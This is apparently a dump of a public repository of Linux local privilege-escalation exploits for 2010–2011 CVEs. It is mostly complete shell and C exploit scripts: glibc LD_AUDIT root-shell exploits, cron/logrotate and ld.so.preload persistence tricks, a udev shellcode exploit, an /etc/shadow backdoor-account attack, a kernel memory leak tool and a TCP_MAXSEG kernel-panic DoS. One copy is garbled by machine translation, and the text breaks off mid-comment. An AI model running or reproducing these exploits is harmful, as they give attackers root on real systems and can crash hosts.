-d ~/.ssh ] && { mkdir ~/.ssh || return 1; } 55 | mv "$KEY.pub" ~/.ssh/authorized_keys || return 1 56 | echo "[*] SSH key set up" 57 | } 58 | key_remove() { 59 | rm -f "$KEY" 60 | restore ~/.ssh/authorized_keys 61 | echo "[*] SSH key removed" 62 | } 63 | own() { 64 | [ -e ~/.cache ] && rm -rf ~/.cache 65 | ln -s "$1" ~/.cache || return 1 66 | echo "[*] spawn ssh" 67 | ssh -o 'NoHostAuthenticationForLocalhost yes' -i "$KEY" localhost true 68 | [ -w "$1" ] || { echo "[-] Own $1 failed"; restore ~/.cache; bye; } 69 | echo "[+] owned: $1" 70 | } 71 | bye() { 72 | key_remove 73 | exit 1 74 | } 75 | KEY="$(mktemp -u)" 76 | key_create || { echo "[-] Failed to setup SSH key"; exit 1; } 77 | backup ~/.cache || { echo "[-] Failed to backup ~/.cache"; bye; } 78 | own /etc/passwd && echo "$P" >> /etc/passwd 79 | own /etc/shadow && echo "$S" >> /etc/shadow 80 | restore ~/.cache || { echo "[-] Failed to restore ~/.cache"; bye; } 81 | key_remove 82 | echo "[+] Success! Use password toor to get root" 83 | su -c "sed -i '/toor:/d' /etc/{passwd,shadow}; chown root: /etc/{passwd,shadow}; \ 84 | chgrp shadow /etc/shadow; nscd -i passwd >/dev/null 2>&1; bash" toor -------------------------------------------------------------------------------- /2010/CVE-2010-2961.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # by fuzz. For Anux inc. 
# 3 | # ubuntu 10.04 , 10.10 4 | if [ -z "$1" ] 5 | then 6 | echo "usage: $0 " 7 | echo "see here http://www.reactivated.net/writing_udev_rules.html" 8 | exit 9 | fi 10 | cat > usn985-exploit.sh << EOF 11 | #!/bin/sh 12 | chown root:root $PWD/usn985-sc 13 | chmod +s $PWD/usn985-sc 14 | EOF 15 | cat > usn985-sc.c << EOF 16 | char *s="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x52\x68\x6e\x2f\x73\x68" 17 | "\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; 18 | main(){int *r;*((int *)&r+2)=(int)s;} 19 | EOF 20 | gcc usn985-sc.c -o usn985-sc 21 | echo "KERNEL==\"$1\", RUN+=\"$PWD/usn985-exploit.sh\"" >> /dev/.udev/rules.d/root.rules 22 | chmod +x usn985-exploit.sh 23 | echo "All set, now wait for udev to restart (reinstall, udev upgrade, SE, raep, threat.)" 24 | echo "Once the conf is reloaded, just make the udev event happen : usn985-sc file will get suid-root" -------------------------------------------------------------------------------- /2010/CVE-2010-3301/15023: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3301/15023 -------------------------------------------------------------------------------- /2010/CVE-2010-3437/15150: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3437/15150 -------------------------------------------------------------------------------- /2010/CVE-2010-3847.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo wait 3 | cat > a.c << _EOF 4 | void __attribute__((constructor)) init() 5 | { 6 | setuid(0); 7 | system("/bin/bash"); 8 | } 9 | _EOF 10 | mkdir /tmp/lenis 11 | ln /bin/ping /tmp/lenis/target 12 | exec 3< /tmp/lenis/target 13 | rm -rf 
/tmp/lenis/ 14 | gcc -w -fPIC -shared -o /tmp/lenis a.c 15 | rm -r a.c 16 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 -------------------------------------------------------------------------------- /2010/CVE-2010-3856/CVE-2010-3856.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ####################################################### 4 | # I Can't Read and I Won't Race You Either # 5 | # by zx2c4 # 6 | ####################################################### 7 | 8 | ################################################################################ 9 | # This is an exploit for CVE-2010-3856. 10 | # 11 | # A while back, Tavis showed us three ways to exploit flaws in glibc's dynamic 12 | # linker involving LD_AUDIT. [1] [2] 13 | # 14 | # The first way involved opening a file descriptor and using fexecve to easily 15 | # win a race with $ORIGIN. The problem was that this required having read 16 | # permissions on the SUID executables. Tavis recommended a work around involving 17 | # filling a pipe until it was full so that anything written to stderr would 18 | # block. This race, however, was not always successful. The third thing he 19 | # showed us was that LD_AUDIT would load any trusted library, and he pointed out 20 | # that libpcprofile.so could be jiggered to create a world writable root owned 21 | # file in any directory. One candidate would be to write something to a crontab. 22 | # What if, however, you don't have cron installed? He then went on to explain a 23 | # quite extensive search routine to find candidates for libraries to load. 24 | # 25 | # But why search, when you already can make a world writable root owned file in 26 | # any directory you want? The easier way is to use libpcprofile.so to create 27 | # such a file, and then fill that file with code you want to run. Then, run that 28 | # code using the same trick. Pretty simple, and it works. 
29 | # 30 | # - zx2c4 31 | # 2011-11-9 32 | # 33 | # greets to taviso. 34 | # 35 | # [1] http://seclists.org/fulldisclosure/2010/Oct/257 36 | # [2] http://seclists.org/bugtraq/2010/Oct/200 37 | ################################################################################ 38 | 39 | echo "[+] Setting umask to 0 so we have world writable files." 40 | umask 0 41 | 42 | echo "[+] Preparing binary payload." 43 | cat > /tmp/payload.c <<_EOF 44 | void __attribute__((constructor)) init() 45 | { 46 | printf("[+] Cleaning up.\n"); 47 | unlink("/lib/libexploit.so"); 48 | 49 | printf("[+] Launching shell.\n"); 50 | setuid(0); 51 | setgid(0); 52 | setenv("HISTFILE", "/dev/null", 1); 53 | execl("/bin/sh", "/bin/sh", "-i", 0); 54 | } 55 | _EOF 56 | gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 57 | 58 | echo "[+] Writing root owned world readable file in /lib" 59 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/lib/libexploit.so" ping 2>/dev/null 60 | 61 | echo "[+] Filling the lib file with lib contents." 62 | cat /tmp/exploit > /lib/libexploit.so 63 | rm /tmp/payload.c /tmp/exploit 64 | 65 | echo "[+] Executing payload." 
66 | LD_AUDIT="libexploit.so" ping 67 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/DSO_libmemusage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | # 3 | # [+] Glibc <= 2.12.x, 2.11.3, 2.12.2 LD_AUDIT libmemusage.so local root exploit 4 | # 5 | # Edited by Todor Donev (todor dot donev at gmail dot com) 6 | # This is another exploit for CVE-2010-3856 7 | # 8 | # Thanks to Tavis 'taviso' Ormandy, zx2c4, Marco 'raptor' Ivaldi, Stiliyan Angelov 9 | # and Tsvetelina Emirska 10 | # 11 | # Another exploits: 12 | # http://www.0xdeadbeef.info/exploits/raptor_ldaudit 13 | # http://www.0xdeadbeef.info/exploits/raptor_ldaudit2 14 | # http://www.exploit-db.com/exploits/18105/ 15 | # http://seclists.org/fulldisclosure/2010/Oct/257 16 | # http://seclists.org/bugtraq/2010/Oct/200 17 | # 18 | echo "[+] Setting umask to 0 so we have world writable files." 19 | umask 0 20 | echo "[+] Preparing binary payload.." 21 | cat > /tmp/payload.c <<_EOF 22 | void __attribute__((constructor)) init() 23 | { 24 | unlink("/lib/sploit.so"); 25 | setuid(0); 26 | setgid(0); 27 | setenv("HISTFILE", "/dev/null", 1); 28 | execl("/bin/sh", "/bin/sh", "-i", 0); 29 | } 30 | _EOF 31 | gcc -w -fPIC -shared -o /tmp/exploit /tmp/payload.c 32 | echo "[+] Writing root owned world readable file in /lib" 33 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="/lib/sploit.so" ping 2>/dev/null 34 | echo "[+] Filling the lib file with lib contents." 35 | cat /tmp/exploit > /lib/sploit.so 36 | rm /tmp/payload.c /tmp/exploit 37 | echo "[+] Executing payload.." 
38 | LD_AUDIT="sploit.so" ping 39 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_libmemusage.so.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | 4 | OUTPUT=/etc/ld.so.preload 5 | 6 | MASK=`umask` 7 | umask 0 8 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null 9 | if [ ! -f $OUTPUT ]; then 10 | echo "System does not appear to be vulnerable" 11 | exit 0 12 | fi 13 | echo -n > $OUTPUT 14 | umask $MASK 15 | 16 | cat > exec.c << EOF 17 | #include 18 | #include 19 | main(int argc, char *argv[]) 20 | { 21 | if(argc == 2) { 22 | setgid(0); setuid(0); 23 | system(argv[1]); } 24 | return 0; 25 | } 26 | EOF 27 | gcc exec.c -o exec 28 | 29 | cat > sh.c << EOF 30 | #include 31 | #include 32 | #include 33 | int main () 34 | { 35 | setuid(geteuid()); 36 | setgid(getegid()); 37 | execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL); 38 | return 0; 39 | } 40 | EOF 41 | gcc sh.c -o sh 42 | 43 | cat > libpwn.c << EOF 44 | #include 45 | #include 46 | uid_t getuid (void) 47 | { 48 | chown("$PWD/sh", 0, 0); 49 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 50 | return 0; 51 | } 52 | EOF 53 | gcc -Wall -fPIC -c libpwn.c 54 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 55 | 56 | echo "$PWD/libpwn.so" > $OUTPUT 57 | ping 2> /dev/null 58 | echo -n > $OUTPUT 59 | ./sh 60 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_libpcprofile.so.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT=/etc/ld.so.preload 6 | 7 | MASK=`umask` 8 | umask 0 9 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$OUTPUT" ping 2> /dev/null 10 | if [ ! 
-f $OUTPUT ]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo -n > $OUTPUT 15 | umask $MASK 16 | 17 | cat > sh.c << EOF 18 | #include 19 | #include 20 | int main (int argc, char **argv, char **envp) 21 | { 22 | char *args[] = { "/bin/bash", NULL }; 23 | setuid(geteuid()); 24 | setgid(getegid()); 25 | execve(args[0], args, envp); 26 | perror("execve failed"); 27 | return 0; 28 | } 29 | EOF 30 | gcc sh.c -o sh 31 | 32 | cat > libpwn.c << EOF 33 | #include 34 | #include 35 | uid_t getuid (void) 36 | { 37 | chown("$PWD/sh", 0, 0); 38 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 39 | return 0; 40 | } 41 | EOF 42 | gcc -Wall -fPIC -c libpwn.c 43 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 44 | 45 | echo "$PWD/libpwn.so" > $OUTPUT 46 | ping 2> /dev/null 47 | echo -n > $OUTPUT 48 | ./sh 49 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/glibc_nondebian.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | cat > sh.c << EOF 3 | #include 4 | #include 5 | main(int argc, char *argv[]) 6 | { 7 | if(argc == 2) { 8 | setgid(0); setuid(0); 9 | system(argv[1]); } 10 | return 0; 11 | } 12 | EOF 13 | gcc sh.c -o sh 14 | cat > payload.c << EOF 15 | void __attribute__((constructor)) init() 16 | { 17 | setgid(0); 18 | setuid(0); 19 | system("chown root:root sh; chmod 4755 sh"); 20 | } 21 | EOF 22 | gcc -w -fPIC -shared -o exploit2 payload.c 23 | PWDEXP=. 
24 | mkdir $PWDEXP/exploit 25 | ln /bin/ping $PWDEXP/exploit/target 26 | exec 3< $PWDEXP/exploit/target 27 | rm -rf $PWDEXP/exploit 28 | cp exploit2 exploit 29 | chmod 0755 exploit 30 | LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3 31 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/libmemusage.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT=/etc/ld.so.preload 6 | 7 | MASK=`umask` 8 | umask 0 9 | LD_AUDIT="libmemusage.so" MEMUSAGE_OUTPUT="$OUTPUT" ping 2> /dev/null 10 | if [ ! -f $OUTPUT ]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo -n > $OUTPUT 15 | umask $MASK 16 | 17 | cat > exec.c << EOF 18 | #include 19 | #include 20 | main(int argc, char *argv[]) 21 | { 22 | if(argc == 2) { 23 | setgid(0); setuid(0); 24 | system(argv[1]); } 25 | return 0; 26 | } 27 | EOF 28 | gcc exec.c -o exec 29 | 30 | cat > sh.c << EOF 31 | #include 32 | #include 33 | #include 34 | int main () 35 | { 36 | setuid(geteuid()); 37 | setgid(getegid()); 38 | execl("/bin/sh", "bin/sh","-c", "cp ./exec ./exec2; chown root ./exec2; chgrp root ./exec2; chmod 755 ./exec2; chmod +s ./exec2;", NULL); 39 | return 0; 40 | } 41 | EOF 42 | gcc sh.c -o sh 43 | 44 | cat > libpwn.c << EOF 45 | #include 46 | #include 47 | uid_t getuid (void) 48 | { 49 | chown("$PWD/sh", 0, 0); 50 | chmod("$PWD/sh", S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IRGRP|S_IXGRP|S_IROTH|S_IXOTH); 51 | return 0; 52 | } 53 | EOF 54 | gcc -Wall -fPIC -c libpwn.c 55 | gcc -shared -Wl,-soname,libpwn.so -o libpwn.so libpwn.o 56 | 57 | echo "$PWD/libpwn.so" > $OUTPUT 58 | ping 2> /dev/null 59 | echo -n > $OUTPUT 60 | ./sh 61 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/libpcprofile.sh: -------------------------------------------------------------------------------- 1 | #! 
/ Bin / bash 2 | # CVE-2010-3856 3 | # Author: deadbyte 4 | 5 | OUTPUT = / etc / ld.so.preload 6 | 7 | MASK = `umask` 8 | umask 0 9 | LD_AUDIT = "libpcprofile.so" PCPROFILE_OUTPUT = "$ OUTPUT" ping 2> / dev / null 10 | if [! -F $ OUTPUT]; then 11 | echo "System does not appear to be vulnerable" 12 | exit 0 13 | fi 14 | echo-n> $ OUTPUT 15 | umask $ MASK 16 | 17 | cat> sh.c << EOF 18 | # Include 19 | # Include 20 | int main (int argc, char ** argv, char ** envp) 21 | { 22 | char * args [] = {"/ bin / bash", NULL}; 23 | setuid (geteuid ()); 24 | setgid (getegid ()); 25 | execve (args [0], args, envp); 26 | perror ("execve failed"); 27 | return 0; 28 | } 29 | EOF 30 | gcc sh.c-o sh 31 | 32 | cat> libpwn.c << EOF 33 | # Include 34 | # Include 35 | uid_t getuid (void) 36 | { 37 | chown ("$ PWD / sh", 0, 0); 38 | chmod ("$ PWD / sh", S_ISUID | S_IRUSR | S_IWUSR | S_IXUSR | S_IRGRP | S_IXGRP | S_IROTH | S_IXOTH); 39 | return 0; 40 | } 41 | EOF 42 | gcc-Wall-fPIC-c libpwn.c 43 | gcc-shared-Wl,-soname, libpwn.so-o libpwn.so libpwn.o 44 | 45 | echo "$ PWD / libpwn.so"> $ OUTPUT 46 | ping 2> / dev / null 47 | echo-n> $ OUTPUT 48 | . 
/ Sh -------------------------------------------------------------------------------- /2010/CVE-2010-3856/raptor_ldaudit.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_ldaudit2,v 1.2 2011/02/04 11:05:15 raptor Exp $ 5 | # 6 | # raptor_ldaudit2 - another glibc ld.so exploit (logrotate) 7 | # Copyright (c) 2010 Marco Ivaldi 8 | # 9 | # Property of @ Mediaservice.net Srl Data Security Division 10 | # http://www.mediaservice.net/ http://lab.mediaservice.net/ 11 | # 12 | # ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 13 | # before 2.12.2, does not properly restrict use of the LD_AUDIT environment 14 | # variable to reference dynamic shared objects (DSOs) as audit objects, which 15 | # allows local users to gain privileges by leveraging an unsafe DSO located in 16 | # a trusted library directory, as demonstrated by libpcprofile.so 17 | # (CVE-2010-3856). 18 | # 19 | # "Suit up. Score chicks. Be awesome." -- Barney Stinson 20 | # 21 | # This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 22 | # Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344 23 | # 24 | # This exploit uses the logrotate attack vector. See also the cron.d version 25 | # available at: http://www.0xdeadbeef.info/exploit/raptor_ldaudit 26 | # 27 | # Usage: 28 | # $ chmod +x raptor_ldaudit2 29 | # $ ./raptor_ldaudit2 30 | # [...] 31 | # Everything looks fine. 32 | # Just wait until logrotate is run and check /tmp/pwned. 33 | # [...] 34 | # $ /tmp/pwned 35 | # sh-4.1# id 36 | # uid=0(root) gid=0(root) groups=0(root),100(users) 37 | # sh-4.1# 38 | # [don't forget to delete /tmp/pwned* and /var/log/runme*!] 39 | # 40 | # Vulnerable platforms: 41 | # Slackware 13.1 [tested] 42 | # openSUSE 11.3 [untested] 43 | # Fedora Core 13 [untested] 44 | # RHEL/CentOS 5 [untested] 45 | # Ubuntu 10 [untested] 46 | # [...] 
47 | # 48 | 49 | echo "raptor_ldaudit2 - another glibc ld.so exploit (logrotate)" 50 | echo "Copyright (c) 2010 Marco Ivaldi " 51 | echo 52 | 53 | # prepare setuid shell helper to circumvent bash checks 54 | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c 55 | gcc -o /tmp/pwned /tmp/pwned.c 56 | if [ $? -ne 0 ]; then 57 | echo "Error: Problems compiling setuid shell helper, check your gcc." 58 | exit 1 59 | fi 60 | 61 | # create a fake log file in /var/log 62 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/var/log/runme" ping 2>/dev/null 63 | 64 | # do the magic! 65 | runme="/etc/logrotate.d/runme" 66 | umask 0 67 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null 68 | if [ "`cat $runme 2>/dev/null`" = "" ]; then 69 | echo "Error: Not vulnerable or wrong attack vector? See comments." 70 | exit 1 71 | fi 72 | 73 | # build the logrotate script 74 | echo "/var/log/runme {" > $runme 75 | echo "daily" >> $runme 76 | echo "size=0" >> $runme 77 | echo "firstaction" >> $runme 78 | echo "chown root /tmp/pwned;chmod 4755 /tmp/pwned;rm -f $runme" >> $runme 79 | echo "endscript" >> $runme 80 | echo "}" >> $runme 81 | 82 | # legen -- wait for it -- dary! 83 | echo "Everything looks fine." 84 | echo "Just wait until logrotate is run and check /tmp/pwned." 
85 | -------------------------------------------------------------------------------- /2010/CVE-2010-3856/raptor_ldaudit2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # 4 | # $Id: raptor_ldaudit,v 1.2 2011/02/04 11:05:15 raptor Exp $ 5 | # 6 | # raptor_ldaudit - privilege escalation through glibc ld.so 7 | # Copyright (c) 2010 Marco Ivaldi 8 | # 9 | # Property of @ Mediaservice.net Srl Data Security Division 10 | # http://www.mediaservice.net/ http://lab.mediaservice.net/ 11 | # 12 | # ld.so in the GNU C Library (aka glibc or libc6) before 2.11.3, and 2.12.x 13 | # before 2.12.2, does not properly restrict use of the LD_AUDIT environment 14 | # variable to reference dynamic shared objects (DSOs) as audit objects, which 15 | # allows local users to gain privileges by leveraging an unsafe DSO located in 16 | # a trusted library directory, as demonstrated by libpcprofile.so 17 | # (CVE-2010-3856). 18 | # 19 | # "Suit up. Score chicks. Be awesome." -- Barney Stinson 20 | # 21 | # This vulnerability has been disclosed by Tavis Ormandy (with thanks to Ben 22 | # Hawkes and Julien Tinnes): http://seclists.org/fulldisclosure/2010/Oct/344 23 | # 24 | # Other possible attack vectors: /etc/cron.{hourly,daily,weekly,monthly}, at 25 | # (/var/spool/atjobs/), xinetd (/etc/xinetd.d), /etc/logrotate.d and more... 26 | # 27 | # Usage: 28 | # $ chmod +x raptor_ldaudit 29 | # $ ./raptor_ldaudit 30 | # [...] 31 | # Everything looks fine. Just wait for it... LEGEN-DARY! 32 | # -rwsr-xr-x 1 root users 5707 2010-11-11 14:48 /tmp/pwned 33 | # sh-4.1# id 34 | # uid=0(root) gid=0(root) groups=0(root),100(users) 35 | # sh-4.1# 36 | # [don't forget to delete /tmp/pwned*!] 37 | # 38 | # Vulnerable platforms: 39 | # Slackware 13.1 [tested, weird loop in dillon's cron but it works] 40 | # openSUSE 11.3 [untested] 41 | # Fedora Core 13 [untested] 42 | # RHEL/CentOS 5 [untested] 43 | # Ubuntu 10 [untested] 44 | # [...] 
45 | # 46 | 47 | echo "raptor_ldaudit - privilege escalation through glibc ld.so" 48 | echo "Copyright (c) 2010 Marco Ivaldi " 49 | echo 50 | 51 | # prepare setuid shell helper to circumvent bash checks 52 | echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c 53 | gcc -o /tmp/pwned /tmp/pwned.c 54 | if [ $? -ne 0 ]; then 55 | echo "Error: Problems compiling setuid shell helper, check your gcc." 56 | exit 1 57 | fi 58 | 59 | # do the magic! 60 | runme="/etc/cron.d/runme" 61 | umask 0 62 | LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="$runme" ping 2>/dev/null 63 | if [ "`cat $runme 2>/dev/null`" = "" ]; then 64 | echo "Error: Not vulnerable or wrong attack vector? See comments." 65 | exit 1 66 | fi 67 | 68 | # build the cron script (vixie's crontab) 69 | echo -n > $runme 70 | echo "* * * * * root chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme 71 | # build the cron script (dillon's crontab) 72 | echo "* * * * * chown root /tmp/pwned; chmod 4755 /tmp/pwned; rm -f $runme" >> $runme 73 | 74 | # legen -- wait for it -- dary! 75 | echo -n "Everything looks fine. Just wait for it... " 76 | sleep 70 77 | echo "LEGEN-DARY!" 
78 | ls -l /tmp/pwned
79 | /tmp/pwned
80 |
--------------------------------------------------------------------------------
/2010/CVE-2010-3904/15285:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3904/15285
--------------------------------------------------------------------------------
/2010/CVE-2010-3904/linux-rds-exploit:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-3904/linux-rds-exploit
--------------------------------------------------------------------------------
/2010/CVE-2010-4077, 2.6.37/CVE-2010-4077.c:
--------------------------------------------------------------------------------
1 | /* Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak
2 | * ================================================
3 | * Information leak exploit for CVE-2010-4077 which
4 | * leaks kernel stack space back to userland due to
5 | * uninitialized struct member "reserved" in struct
6 | * serial_icounter_struct copied to userland. uses
7 | * ioctl to trigger memory leak, dumps to file and
8 | * displays to command line.
9 | *
10 | * -- prdelka
11 | *
12 | */
/*
 * Reviewer notes on the code below (added; the original header is above):
 *
 *   What it does: zero a serial_icounter_struct, ask the tty named in argv[1]
 *   for its interrupt counters with the TIOCGICOUNT ioctl, print reserved[0..9]
 *   as hex, then write those same ten ints to ./leak in the current directory.
 *   Because the buffer is cleared before the ioctl, any non-zero reserved[]
 *   entry can only have come from the kernel's copy-out -- that is the whole
 *   test. Nothing here changes privileges; it is a read-only disclosure probe.
 *
 *   Preconditions: the caller must be able to open the device read-only
 *   (line 30) and the driver must answer TIOCGICOUNT (line 34).
 *
 *   Mitigation: the upstream fix for CVE-2010-4077 -- presumably clearing the
 *   structure inside the kernel before it is copied to user space; on such a
 *   kernel this program should print all zeros. Confirm against the
 *   distribution's changelog rather than the version string in the header.
 *
 *   Listing damage: the header names after each #include were stripped when
 *   this page was generated (most likely the angle-bracket tokens), so the
 *   file does not build as shown.
 */
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 |
21 | int main(int argc, char* argv[]) {
22 | int fd, ret = 0, i;
23 | struct serial_icounter_struct buffer;
24 | printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");
25 | if(argc < 2){
26 | printf("[ You need to supply a device name e.g. /dev/ttyS0\n");
27 | exit(-1); /* exit(-1) is reported to the shell as status 255 */
28 | };
29 | memset(&buffer,0,sizeof(buffer)); /* zero first so leaked kernel bytes cannot be confused with stale user-space stack contents */
30 | if((fd = open(argv[1], O_RDONLY)) == -1){
31 | printf("[ Couldn't open %s\n",argv[1]); /* errno is discarded; perror() would show the real reason (EACCES, ENOENT, ...) */
32 | exit(-1);
33 | }
34 | if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){ /* the kernel fills buffer here; per the header the defect is that reserved[] was not initialised on the kernel side */
35 | printf("[ Problem with ioctl() request\n");
36 | exit(-1);
37 | }
38 | close(fd);
39 | for(i=0;i<=9;i++){ /* NOTE(review): reads ten entries; if reserved[] is declared smaller (the kernel header I recall has reserved[9]) the last read is one past the member -- confirm against linux/serial.h */
40 | printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);
41 | };
42 | if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){ /* no O_TRUNC: an existing longer ./leak keeps its tail beyond the 40 bytes written below */
43 | printf("[ Can't open file to write memory out\n");
44 | exit(-1);
45 | }
46 | for(i=0;i<=9;i++){
47 | ret += write(fd,&buffer.reserved[i],sizeof(int)); /* a failed write returns -1 and is folded into the byte count unchecked */
48 | }
49 | close(fd);
50 | printf("[ Written %d leaked bytes to ./leak\n",ret);
51 | exit(0);
52 | }
--------------------------------------------------------------------------------
/2010/CVE-2010-4170.sh:
--------------------------------------------------------------------------------
1 | printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever
2 |
--------------------------------------------------------------------------------
/2010/CVE-2010-4347/american-sign-language:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/CVE-2010-4347/american-sign-language
--------------------------------------------------------------------------------
/2010/ia32syscall:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2010/ia32syscall
--------------------------------------------------------------------------------
/2011/2.6.18-274/2.6.18-274-2011:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.18-274/2.6.18-274-2011 -------------------------------------------------------------------------------- /2011/2.6.18-6-x86/2.6.18-6-x86-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.18-6-x86/2.6.18-6-x86-2011 -------------------------------------------------------------------------------- /2011/2.6.28/2.6.28-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.28/2.6.28-2011 -------------------------------------------------------------------------------- /2011/2.6.32-46/2-6-32-46-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.32-46/2-6-32-46-2011 -------------------------------------------------------------------------------- /2011/2.6.33/2.6.33-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.33/2.6.33-2011 -------------------------------------------------------------------------------- /2011/2.6.34/2.6.34-2011: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.34/2.6.34-2011 -------------------------------------------------------------------------------- /2011/2.6.34/2.6.34-2011Exploit2: 
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/LukaSikic/Unix-Privilege-Escalation-Exploits-Pack/db431bdbb5e26432d062e56abfee98cdfb5fe4c7/2011/2.6.34/2.6.34-2011Exploit2
--------------------------------------------------------------------------------
/2011/2.6.37-rc2.c:
--------------------------------------------------------------------------------
1 | /*
2 | * TCP_MAXSEG Kernel Panic DoS for Linux < 2.6.37-rc2
3 | * by zx2c4
4 | *
5 | * This exploit triggers CVE-2010-4165, a divide by zero
6 | * error in net/ipv4/tcp.c. Because this is on the softirq
7 | * path, the kernel oopses and then completely dies with
8 | * no chance of recovery. It has been very reliable as a
9 | * DoS, but is not useful for triggering other bugs.
10 | *
11 | * -zx2c4, 28-2-2011
12 | */
/*
 * Reviewer notes (added; the original header is above):
 *
 *   Self-contained availability test. One process opens a TCP listener on
 *   127.0.0.1:31337 with TCP_MAXSEG forced to 12 (line 33) and then connects
 *   to it from a second socket it owns (lines 46-51). Everything stays on
 *   loopback: no packets leave the host, and no privilege is needed or gained.
 *   On an affected kernel the connect() never returns because the machine
 *   oopses (per the header); on a fixed kernel the program prints
 *   "Connection did not trigger oops." and exits 0. Run it only on a
 *   disposable test system -- a positive result takes the whole host down.
 *
 *   Mitigation is a kernel at or after 2.6.37-rc2, or one carrying the
